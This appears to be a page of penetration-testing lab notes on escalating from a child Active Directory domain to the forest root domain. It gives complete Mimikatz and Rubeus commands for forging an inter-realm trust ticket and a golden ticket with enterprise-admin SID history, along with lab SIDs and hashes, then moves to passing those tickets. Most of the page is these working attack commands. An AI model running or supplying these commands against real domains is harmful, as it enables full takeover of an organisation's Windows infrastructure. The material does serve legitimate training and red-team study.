Escalating from child to parent domain
Domains in same forest have an implicit two-way trust with other domains. There is a trust key between the parent and child domains.
There are two ways of escalating privileges between two domains of same forest:
Krbtgt hash
Trust tickets
Method 1: Trust ticket
Child to Forest Root using Trust Tickets requires the trust key. (Look for [In] trust key from child to parent)
Forging trust ticket
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:b543d42b31a43e9eab1466fe5ae8e0e3 /service:krbtgt /target:moneycorp.local"'
Invoke-Rubeus -Command "asktgs /ticket:trust.kirbi /service:CIFS/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /outfile:mcorpEA.kirbi"
Invoke-Rubeus -Command "ptt /ticket:mcorpEA.kirbi"
Method 2: Krbtgt hash
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"'
Remote code execution on forest root domain controller
Last updated